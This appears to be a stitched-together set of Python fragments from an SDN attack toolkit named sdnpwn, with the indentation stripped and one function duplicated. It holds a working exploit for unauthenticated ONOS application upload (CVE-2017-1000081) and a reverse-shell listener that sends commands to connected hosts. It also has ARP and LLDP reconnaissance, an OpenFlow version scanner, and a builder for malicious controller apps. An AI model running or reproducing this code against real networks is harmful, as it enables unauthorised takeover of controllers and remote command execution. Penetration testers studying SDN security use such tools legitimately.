def run(params):
signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
target = ""
app = ""
target = sdnpwn.getArg(["-t", "--target"], params)
port = sdnpwn.getArg(["-p", "--port"], params, "8181")
app = sdnpwn.getArg(["-a", "--app"], params)
if (target == None or app == None):
sdnpwn.printWarning("Missing required parameter.")
exit(0)
sdnpwn.printNormal(
"Attempting unauthenticated app upload (CVE-2017-1000081)")
url = "http://" + target + ":" + str(
port) + "/onos/ui/rs/applications/upload?activate=true"
response = requests.post(url, files={'file': open(app, 'rb')})
if (response.status_code == 200):
sdnpwn.printSuccess(
"Got 200 OK - Application uploaded and activiated!")
else:
sdnpwn.printWarning("Got " + str(response.status_code))
def run(params):
signal.signal(signal.SIGINT, signal_handler) # Assign the signal handler
iface = sdnpwn.getArg(["-i", "--iface"], params, "eth0")
verbose = sdnpwn.checkArg(["-v", "--verbose"], params)
try:
if (verbose):
sdnpwn.printVerbose("Getting MAC and IP address for interface " +
iface)
ifaceIP = sdnpwn.getIPAddress(iface)
ifaceMac = sdnpwn.getMacAddress(iface)
if (ifaceMac == "0" or ifaceIP == "0"):
sdnpwn.printError("Cannot get details for interface " + iface +
" ")
return
if (verbose):
sdnpwn.printVerbose("Making this host known in the network")
sendp(
Ether(src=ifaceMac, dst="FF:FF:FF:FF:FF:FF", type=0x0806) /
ARP(op=ARP.is_at, psrc=ifaceIP, hwsrc=ifaceMac, pdst=ifaceIP)
) # We just want the controller to know about this host
sdnpwn.printNormal("Sending ARP request for this host...")
resp = srp(Ether(src=ifaceMac, dst="FF:FF:FF:FF:FF:FF", type=0x0806) /
ARP(op=ARP.who_has, pdst=ifaceIP),
timeout=2)
try:
if (resp[0][ARP][0][1].psrc == ifaceIP):
sdnpwn.printWarning("Proxy ARP is active")
else:
sdnpwn.printError("Got another address: " +
resp[0][ARP][0][1].psrc)
except:
# This should only fail if there is no response or the response is not ARP.
sdnpwn.printSuccess("Proxy ARP is not active")
except Exception as e:
print(e)
def packetHandler(pkt):
global lldpTimeTrack
lldpContents = {"ONOS": "ONOS Discovery"}
#LLDP: 0x88cc, BDDP: 0x8942
if (pkt.type == 0x88cc):
lldpTime = int(round(time.time()))
if (len(lldpTimeTrack) > 0):
if (lldpTime == lldpTimeTrack[-1]):
return #This is a simple way to try to detect duplicate LLDP messages being picked up by the sniffer.
lldpTimeTrack.append(lldpTime)
if (ignoreLLDPContent == False):
for c in lldpContents:
if (lldpContents[c] in str(pkt)):
sdnpwn.printSuccess("LLDP contents matches " + c)
exit(0)
if (dumpLLDP == True):
print(pkt)
def listenForShell(listeningPort):
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('0.0.0.0', int(listeningPort)))
serversocket.listen(1)
(clientsocket, address) = serversocket.accept()
sdnpwn.printSuccess("Got connection from " + str(address))
cmdThread = Thread(target=sendCommands, args=(clientsocket, ))
cmdThread.start()
threads.append(cmdThread)
socks.append(serversocket)
socks.append(clientsocket)
while stopListening == False:
data = clientsocket.recv(1024).decode()
if (data):
print(data, end='')
else:
break
clientsocket.close()
def run(params):
signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
target = sdnpwn.getArg(["--target", "-t"], params)
port = sdnpwn.getArg(["--port", "-p"], params)
sockTimeout = sdnpwn.getArg(["--socket-timeout", "-s"], params, 2)
of.verbose = False
if (target == None):
print(info())
print(usage())
return
else:
startIndex = 0
endIndex = 1
if ("/" in target):
targets = ip_network(target)
startIndex = 1
endIndex = targets.num_addresses - 1
else:
targets = ip_network(str(target) + "/32")
ports = getPorts(port)
sdnpwn.printNormal("Starting scan")
for host in range(startIndex, endIndex):
targetHost = targets[host].exploded
targetRes = []
for port in ports:
try:
versions = enumerateVersions(targetHost, port, sockTimeout)
except:
pass
if (versions is not None):
targetRes.append((port, versions))
if (len(targetRes) > 0):
prettyPrint(targetHost, targetRes)
sdnpwn.printSuccess("Finished")
def run(params):
signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
appDir = sdnpwn.getArg(["-b", "--build"], params, None)
doConfig = sdnpwn.checkArg(["-c", "--configure"], params)
if(appDir == None):
sdnpwn.message("No app directory specified", sdnpwn.ERROR)
return
if(doConfig):
try:
with open(appDir + "/sdnpwn_options", 'r+') as confFile:
#confFile = open(appDir + "/sdnpwn_options", 'r+')
confOut = ""
for l in confFile.readlines():
conf = l.split("=")
confVal = input(conf[0] + " [" + conf[1].replace("\n","") + "]: ") or conf[1].replace("\n","")
confOut += conf[0] + "=" + confVal + "\n"
confFile.seek(0)
confFile.write(confOut)
except Exception as e:
sdnpwn.printWarning("Error while setting configuration!")
print(e)
return
sdnpwn.printNormal("Building " + appDir)
buildDir = appDir + "-building-temp"
try:
shutil.copytree(appDir, buildDir)
config= {}
with open(buildDir + "/sdnpwn_options", 'r') as confFile:
for l in confFile.readlines():
conf = l.split("=")
config[conf[0]] = conf[1].replace("\n","")
sdnpwn.printNormal("Got configuration")
with open(buildDir + "/pom.xml", 'r+') as pomFile:
pomFileData = pomFile.read()
pomFile.seek(0)
for k in config.keys():
pomFileData = pomFileData.replace(k, config[k])
pomFile.write(pomFileData)
javaFilesLocation = buildDir + "/src/main/java/org/onosproject/app/"
javaFiles = [f for f in listdir(javaFilesLocation) if isfile(join(javaFilesLocation, f))]
for j in javaFiles:
#with open(javaFilesLocation + j, 'r+') as javaFile:
#javaFileData = javaFile.read()
#javaFile.seek(0)
#Above method won't overwrite the whole file for some reason. Should check out why.
javaFile = open(javaFilesLocation + j, 'r')
javaFileData = javaFile.read()
javaFile.close()
for k in config.keys():
javaFileData = javaFileData.replace(k, config[k])
javaFile = open(javaFilesLocation + j, 'w')
javaFile.write(javaFileData)
javaFile.close()
sdnpwn.printSuccess("Files updated with configuration")
sdnpwn.printNormal("Compiling app with maven")
call(['mvn', '-f', buildDir, 'clean', 'install'])
shutil.copy(buildDir + "/target/" + config["$APP_NAME"] + "-1.0-SNAPSHOT.oar", "apps/compiled_apps/")
shutil.copy(buildDir + "/target/" + config["$APP_NAME"] + "-1.0-SNAPSHOT.jar", "apps/compiled_apps/")
sdnpwn.printSuccess("OAR and JAR file moved to apps/compiled_apps")
if(sdnpwn.checkArg(["-k", "--keep-source"], params)):
shutil.copytree(buildDir, appDir + "-" + str(datetime.datetime.now()).split(" ")[0])
sdnpwn.printNormal("App source saved in " + appDir + "-" + str(datetime.datetime.now()).split(" ")[0])
except Exception as e:
sdnpwn.printError("Error building " + appDir)
print(e)
finally:
shutil.rmtree(buildDir)
def onOpen(ws):
sdnpwn.printSuccess("Connected to websocket!")
#Thread(target=requestEvents, args=(ws,)).start()
requestEvents(ws)
def onOpen(ws):
sdnpwn.printSuccess("Connected to websocket!")